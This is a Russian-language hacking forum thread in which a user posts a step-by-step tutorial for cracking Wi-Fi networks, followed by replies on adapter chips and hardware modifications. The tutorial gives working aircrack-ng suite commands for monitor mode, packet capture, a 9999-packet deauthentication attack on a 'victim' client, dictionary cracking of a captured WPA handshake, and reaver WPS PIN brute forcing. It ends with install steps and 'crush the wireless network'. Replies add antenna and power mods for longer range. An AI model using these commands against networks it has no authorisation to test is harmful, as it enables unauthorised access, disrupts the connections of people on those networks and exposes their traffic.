Crack wi-fi

Discussion in 'Песочница' started by BabaDook, 12 May 2015.

  1. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Всем привет Для Васи шЫшкина статья
    И так поехали.
    Первое что на надо это wi-fi адаптер нужный, я же себе взял wifi alfa awus036h ALFA У меня китай . Ну ничего страшного , всё дело в чипе.
    Посмотрите в интерете подходит ваша карта для этого дела. Ну с этим разобрались.
    Второе. Нужен линукс, я использую backtrack 5R3 вернее использовал, теперь kali . Я вас уверяю подойдёт либой линукс. Под виной я не буру рассматривать варианты. Они идентичны. за неким исключением.
    И так всё у нас готово , кара , линукс. начнём с первой команды

    ifconfig - это покажет интерфейс (название нашей карты)
    [​IMG]

    теперь вторая команда
    airmon-ng start wlan0
    Это переведёт карту в режим мониторинга , и создаст новый виртуальный интерфейс , mon1 с которым и будем работать.
    [​IMG]

    Всё, теперь всё приготовили к бою, переходим к активным действиям. начинаем сканировать эфир(точки доступные)

    команда airodump-ng mon1

    [​IMG]
    тут я отметил важную информацию

    разберёмся по картинки

    1- это канал который в данный момент сканируется
    2- это мак адрес точки, роутера. Жертвы
    3-это метод защиты
    4- название точки доступа
    Вот там ещё есть под пункты
    если 2 это мак точки доступа, то 2.1 это мак того человека который подключён к ней
    2.1 мак клиента
    1.1 канал на которым работает точка

    Вроде всё.
    Теперь , выбираем жертву из ходя от метода атаки. Начнём с самого сложного.
    и так нам надо сканировать одну точку а не все , делаем

    airodump-ng --bssid 74:D0:2B:44:AA:CC -c 6 mon1
    Где --bssid мак точки -с канал на которым она работает
    [​IMG]
    -1- это мак точки
    -2- мак клиента, то есть мой
    -3- это активность, можно сказать пакеты.
    и так поскольку она у меня открыта её ломать нечего , поэтому я сейчас поставлю пароль и продолжим

    Об этом чуть позже фото и видео


    Уязвимость этого метода защиты (шифравания) заключается в том что при достаточном количестве пакетов можно получить пароль. Хакер снифирит эти пакеты и и отправляет в программу которая дешифрует и выдаст пароли.
    Фух, роутер меня подводит, рассмотриv wep в другой раз.Тем более это уже почти археологическая находка

    Перейдём в wpa/wp2



    что тут сказать, ту два метода , рассмотрим старый.
    эту атаку можно поделить на две части.
    первая перехват хэндшейха (рукопожатие)
    или момент когда клиент присоединяется к точки, проще сказать момент авторизации клиента
    И второй это дешефровка пароля, собственно начнём
    имеем пароль мега сложный , я всё таки защитил себя паролем
    [​IMG]

    и так поехали .
    перехватываем нужные пакеты
    команда

    airodump-ng --bssid 74:D0:2B:44:AA:CC -c 6 mon1 -w txt.txt
    так всё знакомые команды, кроме одной

    -w txt.txt -w запись файла. название и расширение

    [​IMG]

    там где стрелками должно быть handshake . она была, но очень быстро скрылась , однако своё грязное дело я сделал....



    Упс . Долго ждать момент авторизации, что ж делать, не ждать же вечность .
    На это случай ещё кое что есть , мы просто выгоним его и всё, и ему опять придётся водить пароль да и просто авторизоваться
    +------------------------------------------------------------------------------------------------------------
    +
    + aireplay-ng -0 9999 -a 10:BF:48:B1:F2:C8 -c 84:A4:66:D3:E0:DC --ignore-negative-one mon0
    + Где
    + aireplay-ng <- программа -0 послать пакет (deauthenticate 1 or all stations (-0)
    + 9999 число пакетов которые посылаем -a точк доступа -с мак того кого будем +скидывать(жертвы)
    +------------------------------------------------------------------------------------------------------------
    теперь мы имеем дамп с нужным пакетом, надо вытащить пароль , однако есть один метод это сделать . это брутить , для этого нужен словарь где должен быть этот пароль.
    (вот по этому этот метод взлома плохой и им никогда не ломал )

    и так мы скачали много словарей ТБ на 300 . теперь можно легко брутить , я тоже приготовил словарик, и нужный пароль находиться на 1014 строчки посмотрим что будет

    Кстати, когда мы снифирили создались 4 файлика с расширениям cap csv kismet.csv и kismet.netxml нам нужен cap

    теперь новая команда
    aircrack-ng -a2 /root/txt.txt-02.cap -w '/root/Desktop/pass.txt'
    aircrack-ng <- программа -a2 <- говорим что ломать - это говорим ломать
    /root/txt.txt-02.cap <- путь к нашему дампу -w '/root/Desktop/pass.txt' <-путь к словарю


    aircrack-ng -a2 путь к дамку с рукопожатием -w словарь

    результат будет таким
    [​IMG]

    так а если больше паролей
    в 4 раза , сколько время займёт ?
    давайте посмотрим
    16900 паролей
    тоже находит, но дольше

    и так всё покончим с этим , теперь метод которым я и ломаю

    для этого нам понадобиться минимум усилий
    уязвимость заключается в протоколе WPS
    можем подбирать пины , и когда подберём точка отдаст нам пароль ))

    Список чипов подходящие поддерживаемые reaver
    Полностью
    ath9k
    rtl8187
    carl19170
    ipw2000
    rt2800pci
    rt73usb

    частично

    ath5k
    iwlagn
    b43

    Не поддерживаются

    iwl4965
    RT3070L
    Netgear WG111v3

    Действия
    Узнаём у каких точек включенная опция WPS
    wash -i mon1
    [​IMG]
    и так то что в красном круге вы уже знайте
    -1- версия wps
    -2- wps открыт
    -3- wps закрыт

    нам нужны те что открыты
    поэтому берём любой И

    reaver -i mon0 -b 74:D0:2B:44:AA:CC -c 6 -vv
    reaver <-программа -b mac точки -c канал -vv показывать детали


    [​IMG]

    тут пожалуй без коментов.

    Очень часта проблема это
    WARNING: Detected AP rate limiting, waiting 60 когда точка блокируется . Но об этом завтра
    Устал я однако п.с выложу видео действий по этой статье.

    P.S Я вам наврал про первую команду . ВСЕГДА ПЕРВОЙ КОМАНДОЙ ДОЛЖНА БЫТЬ -h or --h or -hh or -help and help




    Ну и заключение

    установка в kali linux reaver 1.5
    1) - apt-get install libpcap-dev
    2) - apt-get install libsqlite3-dev
    3) - svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ reaver-wps-fork-read-onl
    4) - cd reaver-wps-fork-read-only/src
    5) - ./configure
    6) - make distclean && ./configure
    7) - sudo make
    8) - sudo make install
    9) Запускаем reaver 1.5
    10) Крушим беспроводную сеть !
    P.s Видео к статье И по статье каждый шаг на видео
    п.с знаю что без полезно, но всё же
     
    #1 BabaDook, 12 May 2015
    Last edited: 14 May 2015
  2. 1249qwe

    1249qwe New Member

    Joined:
    12 May 2015
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Я же написал что это только ради одного человека. К тому же там есть засада с одной командой .
     
  4. Suicide

    Suicide Super Moderator
    Staff Member

    Joined:
    24 Apr 2009
    Messages:
    2,483
    Likes Received:
    7,072
    Reputations:
    693
    Человек, к слову, походу так и не понял что это для него.. или виду не подал..
     
    _________________________
    mailbrush likes this.
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Увы да. Я старался максимально всё доступно поддать, наверное всё таки из за того что не в один присест писал статью.
    Потом может перепишу, если руки дойдут и терпение. Но ждать долго придётся
     
    Suicide likes this.
  6. tiger_x

    tiger_x New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    2
    Reputations:
    7
    альфу на чипе 8187 взял?
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Чипсет Realtek RTL8187L
     
  8. begin_end

    begin_end Green member

    Joined:
    4 Jan 2007
    Messages:
    265
    Likes Received:
    639
    Reputations:
    476
    Стоит отметить, что для таких адаптеров, особенно их недорогих китайских аналогов неплохо выполнить ряд модификаций:
    • дополнительно подать на плату адаптера питание +5В толстым медным проводом (0,5-0,75 мм2 сечение) от другого USB, а еще лучше - от иного мощного источника (в этом случае еще нужно перерезать дорожку + ведущую от исходного USBшного питания);
    • установить на поверхность чипа RTL8187L радиатор (подойдет от моста ненужной материнской платы);
    • сконструировать один из вариантов направленных антенн, лично я предпочитаю укороченную прямоугольную рупорную (материал легко ищется).
    Контролировать диаграмму направленности/приблизительную мощность можно посредством обычного... старого кассетного плеера, который во включенном состоянии воспроизведения (естественно без кассеты внутри) позволяет выявить на слух посылки Beacon interval в виде характерных щелчков.
     
    _________________________
    BabaDook likes this.
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Заморочка, у меня 100% Ариджанал Китай))) Но за информацию респект
     
  10. V777

    V777 Elder - Старейшина

    Joined:
    12 May 2015
    Messages:
    1,310
    Likes Received:
    3,179
    Reputations:
    24
    Интересно почему все рекомендуют альфу, если наприер можно взять
    TP-LINK TL-WN7200ND с мощностью исходящего сигнала до 500 мВт и дешевле ?
     
    Shadow Stream likes this.